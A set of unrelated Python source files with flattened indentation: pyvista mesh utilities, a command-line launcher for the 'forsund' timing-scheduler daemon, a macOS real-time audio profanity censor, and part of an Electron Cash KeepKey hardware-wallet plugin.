'vtkExplicitStructuredGrid': pyvista.ExplicitStructuredGrid,
'vtkUnstructuredGrid': pyvista.UnstructuredGrid,
'vtkRectilinearGrid': pyvista.RectilinearGrid,
'vtkStructuredGrid': pyvista.StructuredGrid,
'vtkPolyData': pyvista.PolyData,
'vtkImageData': pyvista.UniformGrid,
'vtkStructuredPoints': pyvista.UniformGrid,
'vtkMultiBlockDataSet': pyvista.MultiBlock,
'vtkTable': pyvista.Table,
# 'vtkParametricSpline': pyvista.Spline,
}
# Check if a dataset is a VTK type
if hasattr(dataset, 'GetClassName'):
key = dataset.GetClassName()
try:
return wrappers[key](dataset)
except KeyError:
logging.warning(f'VTK data type ({key}) is not currently supported by pyvista.')
return
# wrap meshio
if is_meshio_mesh(dataset):
return from_meshio(dataset)
# wrap trimesh
if dataset.__class__.__name__ == 'Trimesh':
# trimesh doesn't pad faces
n_face = dataset.faces.shape[0]
faces = np.empty((n_face, 4), dataset.faces.dtype)
faces[:, 1:] = dataset.faces
faces[:, 0] = 3
return pyvista.PolyData(np.asarray(dataset.vertices), faces)
    # otherwise, tell the user we can't wrap this object
raise NotImplementedError(f'Unable to wrap ({type(dataset)}) into a pyvista type.')
def image_to_texture(image):
"""Convert ``vtkImageData`` (:class:`pyvista.UniformGrid`) to a ``vtkTexture``."""
return pyvista.Texture(image)
def numpy_to_texture(image):
"""Convert a NumPy image array to a vtk.vtkTexture."""
return pyvista.Texture(image)
def is_inside_bounds(point, bounds):
"""Check if a point is inside a set of bounds.
    This is implemented recursively so that it works in N dimensions.
"""
if isinstance(point, (int, float)):
point = [point]
if isinstance(point, (np.ndarray, collections.abc.Sequence)) and not isinstance(point, collections.deque):
if len(bounds) < 2 * len(point) or len(bounds) % 2 != 0:
raise ValueError('Bounds mismatch point dimensionality')
point = collections.deque(point)
bounds = collections.deque(bounds)
return is_inside_bounds(point, bounds)
if not isinstance(point, collections.deque):
raise TypeError(f'Unknown input data type ({type(point)}).')
if len(point) < 1:
return True
p = point.popleft()
lower, upper = bounds.popleft(), bounds.popleft()
if lower <= p <= upper:
return is_inside_bounds(point, bounds)
return False
def fit_plane_to_points(points, return_meta=False):
"""Fit a plane to a set of points.
Parameters
----------
points : np.ndarray
Size n by 3 array of points to fit a plane through
return_meta : bool
If true, also returns the center and normal used to generate the plane
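    Examples
    --------
    A minimal sketch fitting a plane through a random point cloud (illustrative):
    >>> import numpy as np
    >>> import pyvista
    >>> points = np.random.random((100, 3))
    >>> plane, center, normal = pyvista.fit_plane_to_points(points, return_meta=True)  # doctest:+SKIP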
"""
data = np.array(points)
center = data.mean(axis=0)
result = np.linalg.svd(data - center)
normal = np.cross(result[2][0], result[2][1])
plane = pyvista.Plane(center=center, direction=normal)
if return_meta:
return plane, center, normal
return plane
def raise_not_matching(scalars, mesh):
"""Raise exception about inconsistencies."""
if isinstance(mesh, _vtk.vtkTable):
raise ValueError(f'Number of scalars ({scalars.size}) must match number of rows ({mesh.n_rows}).')
raise ValueError(f'Number of scalars ({scalars.size}) '
f'must match either the number of points ({mesh.n_points}) '
f'or the number of cells ({mesh.n_cells}).')
def generate_plane(normal, origin):
"""Return a _vtk.vtkPlane."""
plane = _vtk.vtkPlane()
# NORMAL MUST HAVE MAGNITUDE OF 1
normal = normal / np.linalg.norm(normal)
plane.SetNormal(normal)
plane.SetOrigin(origin)
return plane
def try_callback(func, *args):
"""Wrap a given callback in a try statement."""
try:
func(*args)
except Exception:
etype, exc, tb = sys.exc_info()
stack = traceback.extract_tb(tb)[1:]
formatted_exception = \
'Encountered issue in callback (most recent call last):\n' + \
''.join(traceback.format_list(stack) +
traceback.format_exception_only(etype, exc)).rstrip('\n')
logging.warning(formatted_exception)
return
def check_depth_peeling(number_of_peels=100, occlusion_ratio=0.0):
"""Check if depth peeling is available.
Attempts to use depth peeling to see if it is available for the
current environment. Returns ``True`` if depth peeling is
available and has been successfully leveraged, otherwise
``False``.
"""
# Try Depth Peeling with a basic scene
source = _vtk.vtkSphereSource()
mapper = _vtk.vtkPolyDataMapper()
mapper.SetInputConnection(source.GetOutputPort())
actor = _vtk.vtkActor()
actor.SetMapper(mapper)
# requires opacity < 1
actor.GetProperty().SetOpacity(0.5)
renderer = _vtk.vtkRenderer()
renderWindow = _vtk.vtkRenderWindow()
renderWindow.AddRenderer(renderer)
renderWindow.SetOffScreenRendering(True)
renderWindow.SetAlphaBitPlanes(True)
renderWindow.SetMultiSamples(0)
renderer.AddActor(actor)
renderer.SetUseDepthPeeling(True)
renderer.SetMaximumNumberOfPeels(number_of_peels)
renderer.SetOcclusionRatio(occlusion_ratio)
renderWindow.Render()
return renderer.GetLastRenderingUsedDepthPeeling() == 1
def threaded(fn):
"""Call a function using a thread."""
def wrapper(*args, **kwargs):
thread = Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
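# Usage sketch (illustrative, not from the original source): a function decorated with
# ``threaded`` runs in its own thread on each call and returns the started Thread.
#
#     @threaded
#     def long_task(n):
#         return sum(range(n))
#
#     t = long_task(10_000_000)
#     t.join()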
class conditional_decorator:
"""Conditional decorator for methods."""
def __init__(self, dec, condition):
"""Initialize."""
self.decorator = dec
self.condition = condition
def __call__(self, func):
"""Call the decorated function if condition is matched."""
if not self.condition:
# Return the function unchanged, not decorated.
return func
return self.decorator(func)
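# Usage sketch (illustrative, not from the original source): apply ``threaded`` only when a
# hypothetical ``use_thread`` flag is set; otherwise the function is returned undecorated.
#
#     use_thread = True
#
#     @conditional_decorator(threaded, use_thread)
#     def maybe_background_task():
#         pass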
class ProgressMonitor():
"""A standard class for monitoring the progress of a VTK algorithm.
    This must be used in a ``with`` context, and it will block keyboard
    interrupts from happening until the exit event, as interrupts would crash
    the kernel if the VTK algorithm is still executing.
"""
def __init__(self, algorithm, message="", scaling=100):
"""Initialize observer."""
try:
from tqdm import tqdm
except ImportError:
raise ImportError("Please install `tqdm` to monitor algorithms.")
self.event_type = _vtk.vtkCommand.ProgressEvent
self.progress = 0.0
self._last_progress = self.progress
self.algorithm = algorithm
self.message = message
self._interrupt_signal_received = False
self._old_progress = 0
self._old_handler = None
self._progress_bar = None
def handler(self, sig, frame):
"""Pass signal to custom interrupt handler."""
self._interrupt_signal_received = (sig, frame)
logging.debug('SIGINT received. Delaying KeyboardInterrupt until '
'VTK algorithm finishes.')
def __call__(self, obj, event, *args):
"""Call progress update callback.
On an event occurrence, this function executes.
"""
if self._interrupt_signal_received:
obj.AbortExecuteOn()
else:
progress = obj.GetProgress()
step = progress - self._old_progress
self._progress_bar.update(step)
self._old_progress = progress
def __enter__(self):
"""Enter event for ``with`` context."""
from tqdm import tqdm
# check if in main thread
if threading.current_thread().__class__.__name__ == '_MainThread':
self._old_handler = signal.signal(signal.SIGINT, self.handler)
self._progress_bar = tqdm(total=1, leave=True,
bar_format='{l_bar}{bar}[{elapsed}<{remaining}]')
self._progress_bar.set_description(self.message)
self.algorithm.AddObserver(self.event_type, self)
return self._progress_bar
def __exit__(self, type, value, traceback):
"""Exit event for ``with`` context."""
self._progress_bar.total = 1
self._progress_bar.refresh()
self._progress_bar.close()
self.algorithm.RemoveObservers(self.event_type)
if threading.current_thread().__class__.__name__ == '_MainThread':
signal.signal(signal.SIGINT, self._old_handler)
def abstract_class(cls_):
"""Decorate a class, overriding __new__.
    This prevents a class from being instantiated, similar to ``abc.ABCMeta``,
    but does not require an abstract method.
"""
def __new__(cls, *args, **kwargs):
if cls is cls_:
raise TypeError(f'{cls.__name__} is an abstract class and may not be instantiated.')
return object.__new__(cls)
cls_.__new__ = __new__
return cls_
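# Usage sketch (illustrative, not from the original source):
#
#     @abstract_class
#     class BaseReader:
#         pass
#
#     BaseReader()        # raises TypeError: BaseReader is an abstract class ...
#
#     class CSVReader(BaseReader):
#         pass
#
#     CSVReader()         # subclasses can still be instantiated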
def axis_rotation(points, angle, inplace=False, deg=True, axis='z'):
"""Rotate points angle (in deg) about an axis.
Parameters
----------
points : numpy.ndarray
Array of points with shape ``(N, 3)``
angle : float
Rotation angle.
inplace : bool, optional
Updates points in-place while returning nothing.
deg : bool, optional
If `True`, the angle is interpreted as degrees instead of
radians. Default is `True`.
axis : str, optional
Name of axis to rotate about. Valid options are ``'x'``, ``'y'``,
and ``'z'``. Default value is ``'z'``.
Returns
-------
points : numpy.ndarray
Rotated points.
Examples
--------
Rotate a set of points by 90 degrees about the x-axis in-place.
>>> import numpy as np
>>> import pyvista
>>> from pyvista import examples
>>> points = examples.load_airplane().points
>>> points_orig = points.copy()
>>> pyvista.axis_rotation(points, 90, axis='x', deg=True, inplace=True)
>>> assert np.all(np.isclose(points[:, 0], points_orig[:, 0]))
>>> assert np.all(np.isclose(points[:, 1], -points_orig[:, 2]))
>>> assert np.all(np.isclose(points[:, 2], points_orig[:, 1]))
"""
axis = axis.lower()
axis_to_vec = {
'x': (1, 0, 0),
'y': (0, 1, 0),
'z': (0, 0, 1)
}
if axis not in axis_to_vec:
raise ValueError('Invalid axis. Must be either "x", "y", or "z"')
rot_mat = transformations.axis_angle_rotation(axis_to_vec[axis], angle, deg=deg)
return transformations.apply_transformation_to_points(rot_mat, points, inplace=inplace)
def cubemap(path='', prefix='', ext='.jpg'):
"""Construct a cubemap from 6 images.
Each of the 6 images must be in the following format:
- <prefix>negx<ext>
- <prefix>negy<ext>
- <prefix>negz<ext>
- <prefix>posx<ext>
- <prefix>posy<ext>
- <prefix>posz<ext>
Prefix may be empty, and extension will default to ``'.jpg'``
For example, if you have 6 images with the skybox2 prefix:
- ``'skybox2-negx.jpg'``
- ``'skybox2-negy.jpg'``
- ``'skybox2-negz.jpg'``
- ``'skybox2-posx.jpg'``
- ``'skybox2-posy.jpg'``
- ``'skybox2-posz.jpg'``
Parameters
----------
prefix : str, optional
Prefix to the filename.
ext : str, optional
The filename extension. For example ``'.jpg'``.
path : str, optional
Directory containing the cubemap images.
Returns
-------
pyvista.Texture
Texture with cubemap.
Examples
--------
>>> import pyvista
>>> skybox = pyvista.cubemap('my_directory', 'skybox', '.jpeg') # doctest:+SKIP
"""
sets = ['posx', 'negx', 'posy', 'negy', 'posz', 'negz']
image_paths = [os.path.join(path, f'{prefix}{suffix}{ext}') for suffix in sets]
for image_path in image_paths:
if not os.path.isfile(image_path):
file_str = '\n'.join(image_paths)
raise FileNotFoundError(f'Unable to locate {image_path}\n'
'Expected to find the following files:\n'
f'{file_str}')
texture = pyvista.Texture()
texture.cube_map = True # Must be set prior to setting images
# add each image to the cubemap
for i, fn in enumerate(image_paths):
image = pyvista.read(fn)
flip = _vtk.vtkImageFlip()
flip.SetInputDataObject(image)
flip.SetFilteredAxis(1) # flip y axis
flip.Update()
texture.SetInputDataObject(i, flip.GetOutput())
return texture
|
forsund.py
|
# -*- coding: utf-8 -*-
# 15/6/27
# created by: snower
from __future__ import absolute_import, division, print_function, with_statement
import os
import sys
import argparse
import multiprocessing
import atexit
from ..forsun import config
from ..utils import is_py3
parser = argparse.ArgumentParser(description='High-performance timing scheduling service')
parser.add_argument('--conf', dest='conf', default="", help='conf filename')
parser.add_argument('--bind', dest='bind_host', default="", help='bind host (default: 127.0.0.1)')
parser.add_argument('--port', dest='bind_port', default=0, type=int, help='bind port (default: 6458)')
parser.add_argument('--http', dest='http_bind', default="", help='bind http server (default: ) example: 127.0.0.1:80')
parser.add_argument('--demon', dest='demon', nargs='?', const=True, default=False, type=bool, help='run in daemon mode')
parser.add_argument('--nodemon', dest='nodemon', nargs='?', const=True, default=False, type=bool, help='do not run in daemon mode')
parser.add_argument('--log', dest='log_file', default='', type=str, help='log file')
parser.add_argument('--log-level', dest='log_level', default='', type=str, help='log level (default: INFO)')
parser.add_argument('--driver', dest='driver', default='', type=str, help='store driver mem or redis (default: mem)')
parser.add_argument('--driver-mem-store-file', dest='store_mem_store_file', default='', type=str, help='store mem driver store file (default: ~/.forsun.dump)')
parser.add_argument('--driver-redis-host', dest='driver_redis_host', default='', type=str, help='store redis driver host (default: 127.0.0.1)')
parser.add_argument('--driver-redis-port', dest='driver_redis_port', default=0, type=int, help='store redis driver port (default: 6379)')
parser.add_argument('--driver-redis-db', dest='driver_redis_db', default=0, type=int, help='store redis driver db (default: 0)')
parser.add_argument('--driver-redis-password', dest='driver_redis_password', default='', type=str, help='store redis driver password (default: )')
parser.add_argument('--driver-redis-prefix', dest='driver_redis_prefix', default='', type=str, help='store redis driver key prefix (default: forsun)')
parser.add_argument('--driver-redis-server-id', dest='driver_redis_server_id', default=0, type=int, help='store redis driver server id (default: 0)')
parser.add_argument('--extension-path', dest='extension_path', default='', type=str, help='extension path')
parser.add_argument('--extension', dest='extensions', default=[], action="append", type=str, help='extension name')
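# Example invocation (command name and values are illustrative, not from the original source):
#   forsund --conf /etc/forsun.conf --bind 127.0.0.1 --port 6458 --driver redis --driver-redis-host 127.0.0.1 --nodemon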
def main():
args = parser.parse_args()
if args.conf:
try:
config.load_conf(args.conf)
except Exception as e:
print("load conf file error ", str(e))
exit(1)
if args.log_file:
config.set("LOG_FILE", args.log_file)
if args.log_level:
config.set("LOG_LEVEL", args.log_level)
if args.bind_host:
config.set("BIND_ADDRESS", args.bind_host)
if args.bind_port:
config.set("PORT", args.bind_port)
if args.http_bind:
config.set("HTTP_BIND", args.http_bind)
if args.driver:
config.set("STORE_DRIVER", args.driver)
if args.driver_redis_host:
config.set("STORE_REDIS_HOST", args.driver_redis_host)
if args.driver_redis_port:
config.set("STORE_REDIS_PORT", args.driver_redis_port)
if args.driver_redis_db:
config.set("STORE_REDIS_DB", args.driver_redis_db)
if args.driver_redis_password:
config.set("STORE_REDIS_PASSWORD", args.driver_redis_password)
if args.driver_redis_prefix:
config.set("STORE_REDIS_PREFIX", args.driver_redis_prefix)
if args.driver_redis_server_id:
config.set("STORE_REDIS_SERVER_ID", args.driver_redis_server_id)
if args.extension_path:
config.set("EXTENSION_PATH", args.extension_path)
if args.extensions:
config.set("EXTENSIONS", args.extensions)
if not args.nodemon:
from ..forsun import Forsun
def on_start(forsun):
print("forsund started by pid %s" % p.pid)
sys.stdin.close()
sys.stdin = open(os.devnull)
sys.stdout.close()
sys.stdout = open(os.devnull, 'w')
sys.stderr.close()
sys.stderr = open(os.devnull, 'w')
def run():
try:
forsun = Forsun()
forsun.serve(on_start)
except Exception as e:
print(e)
exit(1)
p = multiprocessing.Process(target = run, name=" ".join(sys.argv))
p.start()
if is_py3:
atexit._clear()
else:
atexit._exithandlers = []
else:
try:
from ..forsun import Forsun
forsun = Forsun()
forsun.serve()
except Exception as e:
print(e)
exit(1)
if __name__ == "__main__":
main()
|
censor_realtime_mac.py
|
""" Censors audio chunks in a continuous stream """
import os
import threading
import sounddevice as sd
import soundfile as sf
from pydub import AudioSegment
from audio import improve_accuracy, convert_and_write_chunk, \
read_and_convert_audio
from utils import create_env_var, create_temp_dir, append_before_ext, \
time_filename, MacUtil, CHUNK_LEN
from .censor import Censor
class CensorRealtimeMac(Censor):
""" Removes explicits from audio stream in real-time """
running = True
def __init__(self, args, explicits):
        print('Initialized realtime censor object')
super().__init__(explicits, args.output_encoding, args.output_location)
self.__switch_audio_source()
create_env_var('CLEANSIO_CHUNKS_LIST', '[]')
self.args = args
self.directory = create_temp_dir()
self.chunk_prefix = self.directory + time_filename() + '-'
self.temp_chunk_filepath = self.directory + 'temp_chunk.wav'
self.__update_env_chunks_list(self.temp_chunk_filepath)
self.clean_file = AudioSegment.empty()
self.processing_queue = []
self.processing_lock = threading.Lock()
self.playback_queue = []
self.playback_lock = threading.Lock()
self.samplerate = 44100 # Hertz
self.duration = 5 # seconds
def censor(self):
""" Censors audio chunks in a continuous stream """
# Start thread that will analyze and censor recorded chunks
processing_thread = threading.Thread(target=self.run)
processing_thread.daemon = True
processing_thread.start()
try:
# Device indexes in sd.default.device should have already been set
# to Soundflower (2ch) for input and Built-in Output for output.
# Capture stream from Soundflower (2ch) & play to Built-in Output
with sd.Stream(samplerate=self.samplerate,
blocksize=int(self.samplerate*self.duration),
channels=1, callback=self.callback,
finished_callback=self.finished_callback):
print('#' * 80)
print('Press Return to stop censoring')
print('#' * 80)
input()
except KeyboardInterrupt:
print('\nInterrupted by user')
CensorRealtimeMac.running = False
except Exception as exception:
print(type(exception).__name__ + ': ' + str(exception))
CensorRealtimeMac.running = False
def callback(self, indata, outdata, _, __, status):
""" Process audio data from Stream """
if status:
print(status)
# Add to processing_queue
with self.processing_lock:
self.processing_queue.append(indata.copy())
# Consume playback_queue
with self.playback_lock:
if self.playback_queue:
outdata[:] = self.playback_queue.pop(0)
else:
outdata.fill(0)
def finished_callback(self):
""" Once stream is inactive, output cleaned recordings to audio file """
if self.args.store_recording:
trailing_audio_length = len(self.playback_queue) * CHUNK_LEN
if trailing_audio_length > 0:
self.clean_file = self.clean_file[:-trailing_audio_length]
self.create_clean_file(self.clean_file)
else:
self.print_explicits_count()
def run(self):
""" Process 10 seconds of captured audio data at a time """
index = 0
leftover_mute = 0
while True:
if not CensorRealtimeMac.running:
break
with self.processing_lock:
processing_queue_length = len(self.processing_queue)
if processing_queue_length >= 2:
with self.processing_lock:
frames_to_process = self.processing_queue.pop(0)
next_frames = self.processing_queue[0]
# Convert next two recordings into chunks
recorded_chunk, file_path = \
self.__convert_frames_to_chunk(frames_to_process, index)
next_recorded_chunk, _ = \
self.__convert_frames_to_chunk(next_frames, index+1)
overlapping_chunk, overlapping_path = \
self.__create_overlapping_chunk(recorded_chunk,
next_recorded_chunk,
file_path)
# Create accuracy chunk for current chunk and overlapping chunk
self.__create_accuracy_chunk(recorded_chunk, file_path)
self.__create_accuracy_chunk(overlapping_chunk, overlapping_path)
# Censor current chunk and also mute any spillover explicits
# from previous chunk
clean_chunk_wrapper = self.censor_audio_chunk(file_path)
clean_chunk = AudioSegment.silent(duration=leftover_mute) \
+ clean_chunk_wrapper.segment[leftover_mute:]
# Remember to mute any overlapping explicit in the next chunk
leftover_mute = clean_chunk_wrapper.mute_next_start
# Convert current chunk into frames and add it to the playback
# queue
clean_frames = self.__convert_clean_chunk_to_frames(clean_chunk)
with self.playback_lock:
self.playback_queue.append(clean_frames)
if self.args.store_recording:
self.clean_file += clean_chunk
index += 1
def __convert_frames_to_chunk(self, frames, index):
file_path = self.chunk_prefix + str(index) +'.wav'
sf.write(file_path, frames, self.samplerate)
self.__update_env_chunks_list(file_path)
recorded_chunk = read_and_convert_audio(file_path)
return recorded_chunk, file_path
def __convert_clean_chunk_to_frames(self, chunk):
chunk.export(self.temp_chunk_filepath, format='wav')
clean_frames, _ = sf.read(self.temp_chunk_filepath,
dtype='float32',
fill_value=0.0,
frames=int(self.samplerate*self.duration),
always_2d=True)
return clean_frames
def __create_overlapping_chunk(self, chunk1, chunk2, file_path):
overlapping_chunk = chunk1[2500:] + chunk2[:2500]
overlapping_path = append_before_ext(file_path, '-overlapping')
convert_and_write_chunk(overlapping_chunk, overlapping_path, 'wav')
self.__update_env_chunks_list(overlapping_path)
return overlapping_chunk, overlapping_path
def __create_accuracy_chunk(self, chunk, file_path):
accuracy_chunk_file_path = append_before_ext(file_path, '-accuracy')
accuracy_chunk = improve_accuracy(chunk)
convert_and_write_chunk(accuracy_chunk, accuracy_chunk_file_path, 'wav')
@classmethod
def __switch_audio_source(cls):
create_env_var('CLEANSIO_OLD_SOUND_OUT', MacUtil.audio_source('output'))
create_env_var('CLEANSIO_OLD_SOUND_IN', MacUtil.audio_source('input'))
MacUtil.switch_audio_source('output', 'Soundflower (2ch)')
MacUtil.switch_audio_source('input', 'Soundflower (2ch)')
cls.__set_default_device('Soundflower (2ch)', 'Built-in Output')
@classmethod
def __set_default_device(cls, input_device_name, output_device_name):
device_index = 0
input_device_index = 2 # Soundflower (2ch) is usually no. 2
output_device_index = 1 # Built-in Output is usually no. 1
for device in sd.query_devices():
if device['name'] == input_device_name:
input_device_index = device_index
if device['name'] == output_device_name:
output_device_index = device_index
device_index += 1
sd.default.device = (input_device_index, output_device_index)
@classmethod
def __update_env_chunks_list(cls, file_path):
""" Call after every write for later cleanup """
env_list = os.environ['CLEANSIO_CHUNKS_LIST']
beginning = '[\'' if env_list[:-1] == '[' else env_list[:-1] + ', \''
create_env_var(
'CLEANSIO_CHUNKS_LIST', beginning + file_path + '\']')
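# Usage sketch (illustrative; the args namespace and explicits value are placeholders inferred
# from the attributes referenced above, not from the original source):
#
#     from argparse import Namespace
#     args = Namespace(output_encoding='wav', output_location='.', store_recording=False)
#     censor = CensorRealtimeMac(args, explicits=['badword'])
#     censor.censor()   # captures from Soundflower (2ch), censors, and plays to Built-in Output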
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electroncash.util import bfh, bh2u, UserCancelled
from electroncash.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT, deserialize_xpub
from electroncash import networks
from electroncash.i18n import _
from electroncash.transaction import deserialize, Transaction
from electroncash.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electroncash.address import Address
from electroncash.plugins import Device
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password, *, use_cache=False):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None:
raise RuntimeError(_('Offline signing with {} is not supported.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
usb_context = None
SUPPORTED_XTYPES = ('standard', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
from usb1 import USBContext
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
self.device_manager().register_devices(self.DEVICE_IDS)
self.device_manager().register_enumerate_func(self.enumerate)
self.usb_context = USBContext()
self.usb_context.open()
self.libraries_available = True
except ImportError:
self.libraries_available = False
def libusb_enumerate(self):
from keepkeylib.transport_webusb import DEVICE_IDS
for dev in self.usb_context.getDeviceIterator(skip_on_error=True):
usb_id = (dev.getVendorID(), dev.getProductID())
if usb_id in DEVICE_IDS:
yield dev
def _USBDevice_getPath(self, dev):
return ":".join(str(x) for x in ["%03i" % (dev.getBusNumber(),)] + dev.getPortNumberList())
def enumerate(self):
for dev in self.libusb_enumerate():
path = self._USBDevice_getPath(dev)
usb_id = (dev.getVendorID(), dev.getProductID())
yield Device(path=path, interface_number=-1, id_=path, product_key=usb_id, usage_page=0)
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for dev in self.libusb_enumerate():
path = self._USBDevice_getPath(dev)
if path == device.path:
return WebUsbTransport(dev)
self.print_error(f"cannot connect at {device.path}: not found")
return None
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at {} {}".format(device.path, e))
return None
def _try_webusb(self, device):
self.print_error("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.print_error("cannot connect at {} {}".format(device.path, e))
return None
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at {}".format(device.path))
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed {}".format(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise RuntimeError(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
# Doesn't support testnet addresses
return "BitcoinCash"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
            t.daemon = True
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.print_error(str(e))
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
item = str(item).strip()
if not len(item.split()) in [12, 18, 24]:
raise Exception(_("The mnemonic needs to be 12, 18 or 24 words."))
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(item, pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise RuntimeError(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise RuntimeError(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
